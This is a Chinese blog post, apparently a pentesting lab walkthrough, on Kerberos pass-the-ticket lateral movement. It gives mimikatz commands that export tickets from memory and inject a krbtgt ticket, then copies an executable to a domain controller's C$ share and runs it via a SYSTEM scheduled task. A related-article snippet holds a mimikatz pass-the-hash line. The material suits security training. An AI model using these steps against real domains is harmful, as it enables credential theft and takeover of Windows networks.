4.10-pass the ticket票据传递攻击(PTT)横向攻击

最新推荐文章于 2025-05-20 17:01:17 发布
最新推荐文章于 2025-05-20 17:01:17 发布
阅读量383 收藏 9
点赞数 3
分类专栏: 内网(域)渗透攻防 文章标签: 网络安全 web安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38122566/article/details/146317285
版权

pass the ticket 票据传递攻击(PTT)横向攻击

票据传递介绍

        要想使用mimilkatz的哈希传递功能,必须具有本地管理员权限。 mimikatz同样提供了不需要 本地管理员权限进行横向渗透测试的方法。

        例如票据传递( PassThe Ticket,PTT)

        票据传递是基于kerberos认证的一种攻击方式,常用来做后渗透权限维持。

        黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或AES-256的值。

        白银票据攻击利用的前提是得到了域内服务账号的HTML哈希或AES-256的值。

        票据传递攻击一般分为两种

        1、自己制作票据。

        2、传递内存中的票据。

实验复现

导出内存的票据

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

**执行以上命令后,会在当前目录下出现多个服务的票据文件,例如krbtgt、cifs、ldap等。**

清除内存中的票据

shell klist purge

mimikatz kerberos::purge

两个都是清除票据

将高权限的票据文件注入内存

mimikatz kerberos::ptt [e;998d7]-2-0-40e10000-Administrator@krbtgt-HACK.COM.kirbi

查看票据

shell klist

mimikatz kerberos::tgt

访问机器(admin用户,没有过uac)

上线域控

net use \\dc.hack.com

copy C:\Users\admin\Desktop\11.exe \\dc.hack.com\c$

schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\11.exe /ru system /f

schtasks /run/s dc.hack.com /i /tn "test"

[横向移动] Pass The TicketPTT票据传递攻击横向移动
Blue17 の 小窝
03-19 868
攻击不需要攻击者获取到本地管理员权限,只要能获取到内存中遗留的高权限用户的 PTT 即可发起攻击票据传递是一种基于 Kerberos 认证的攻击方式,常用来做后渗透的权限维持。如上,执行上面的命令后会在当前目录中出现多个服务的票据文件,包括 krbtgt、cifs、ldap 等。如上,显示 OK,就代表我们票据注入成功了,接下来我们可以查看一下当前 Shell 中的票据。黄金票据:需要得到域内 Krbtgt 用户的 NTLM Hash 或 AES-256 的值。
PTT票据传递攻击
Y22Lee的博客
05-25 612
PTT(Pass The Ticket),中文叫票据传递攻击PTT 攻击只能用于kerberos认证中,NTLM认证中没有, PTT是通过票据进行认证的。进行票据传递,不需要提权,域用户或者system用户就可以TGTSTPTH:用NTLM-HASH值进行认证-支持kerberos和NTLM认证PTK:用AES值进行认证-只能用于kerberos认证PTT:用票据进行认证-只能用于kerberos认证。
[内网渗透]—票据传递
Sentiment的博客
12-08 1037
之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的域账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)
内网渗透-(黄金票据和白银票据)详解()
duoba_an的博客
04-01 1786
PAC (Privilege Attribute Certificate,特权属性证书),其中所包含的是各种授权信息、附加凭据信息、配置文件和策略信息等。例如用户所属的用户组, 用户所具有的权限等。在最初的RFC1510中规定的标准Kerberos认证过程中并没有PAC,微软在自己的产品中所实现的Kerberos流程加入了PAC的概念,因为在域中不同权限的用户能够访问的资源是不同的,因此微软设计PAC用来辨别用户身份和权限。在一个正常的Kerberos认证流程中。
mimikatz使用哈希 ntlm传递 票据传递
YouthBelief的博客
12-16 2447
(1)管理员运行 (2)必须输入 privilege::debug (3)在目标主机使用mimikatz获取ntlm hash winserver 2012R2 之前版本 可以获取到明文密码 sekurlsa::logonpasswords (4) 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证 sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6
内网横向移动|PTT票据传递横向|Mimikatz Kerberos
qq_60115503的博客
04-25 3774
票据传递攻击(Pass the Ticket,PtT) 票据传递攻击(PtT)是基于Kerberos认证的一种攻击方法,常用来做后渗透权限维持,黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或者AES-256的值,白银票据攻击利用的前提是得到了域内服务账号的NTLM哈希或者AES-256的值,票据传递攻击用来做域控权限维持 什么是Krbtgt用户 每个域控制器都有一个krbtgt的用户账户,是KDC的服务的账户,用来创建票据授予服务(TGS)加密的密钥kerber...
内网渗透(三十九)横向移动篇-pass the ticket 票据传递攻击(PTT)横向攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 663
要想使用mimikatz的哈希传递功能,必须具有本地管理员权限。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法例如票据传递( PassThe Ticket,PTT)票据传递是基于kerberos认证的一种攻击方式,常用来做后渗透权限维持。黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或AES-256的值。白银票据攻击利用的前提是得到了域内服务账号的HTML哈希或AES-256的值。票据传递攻击一般分为两种1、自己制作票据2、传递内存中的票据
内网渗透之PPT票据传递攻击(Pass the Ticket)
qq_53742230的博客
07-31 2079
内网渗透之票据传递攻击
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
票据传递攻击(Pass the Ticket,PtT)
谢公子的博客
06-24 4663
目录 票据传递攻击(Pass the Ticket,PtT) 黄金票据 生成票据并导入 查看票据 验证是否成功 黄金票据和白银票据的不同 票据传递攻击(Pass the Ticket,PtT) 票据传递攻击PtT)是基于Kerberos认证的一种攻击方式,常用来做后渗透权限维持。利用的前提是得到了域内krbtgt用户的密码哈希。 关于Kerberos认证:Kerberos...
PTT(pass the ticket)票据传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
11-03 2430
PTT票据传递攻击,(PTT)是一种使用Kerberos票据代替明文密码或NTLM哈希的方法。PTH基于NTLM认证进行攻击,而PTT基于kerberos协议进行攻击票据传递攻击,目的是伪造、窃取凭据提升权限。
域渗透PTT票据传递攻击(Pass the Ticket)
Longwaer
01-21 2285
通过笔记全方位讲解,加速学习了解PTT票据传递攻击的方法及原理,更好的去掌握黄金、白银票据生成。
票据传递攻击与防范
weixin_45007073的博客
07-11 927
票据传递前言使用mimikatz进行票据传递 前言 之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的域账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。 使用mimikatz进行票据传递 我们首先使用mimikatz将内存中的票据导出。执行完以上命令后,会在当前目录下出现多个服务的票据文件,如krbtgt、cifs、ldap mim
内网渗透(四) | 票据传递攻击
Ms08067安全实验室
06-29 2994
票据传递攻击(Pass the Ticket,PtT)票据传递攻击PtT)是基于Kerberos认证的一种攻击方式,常用来做后渗透权限维持。黄金票据攻击利用的前提是得到了域内krbtg...
mimikatz的使用
谢公子的博客
07-26 3786
mimikatz mimikatz是法国人Gentil Kiwi 编写的一款 Windows 平台下的神器,它具备很多功能,其中最主要的功能是直接从lsass.exe进程里获取处于 active 状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://blog....
内网渗透中mimikatz的使用
热门推荐
pyphrb的博客
07-28 4万+
0x01 简介mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单0x02 测试环境网络资源管理模式:域 已有资源:域内一台主机权限 操作系统:win7 x64 域权限:普通用户0x03 测试目标1、获得域控权限 2、导出所有用户口令 3、维持域控权限0x04 测试过程1、获取本机信息mimikatz:privilege::debug sekurlsa::logonpas
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8704
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全之网络攻击spring临时文件利用
最新发布
anquan2233的博客
05-20 1291
本文探索了JDBC MySQL驱动在利用临时文件进行不出网环境下的反序列化利用,改变了攻击MySQL驱动需要外连FakeServer的传统攻击手法,这种利用方式在realworld中具有更加隐蔽的特性。而文章后半段提到的临时文件部分可以无条件将一个纯净的文件上传到目标服务器并确定位置,对于需要本地文件的攻击(如:ClassPathXmlApplicationContext加载本地XML、加载本地类文件场景、加载本地插件场景等)也是个不错的利用思路。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三叉戟安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值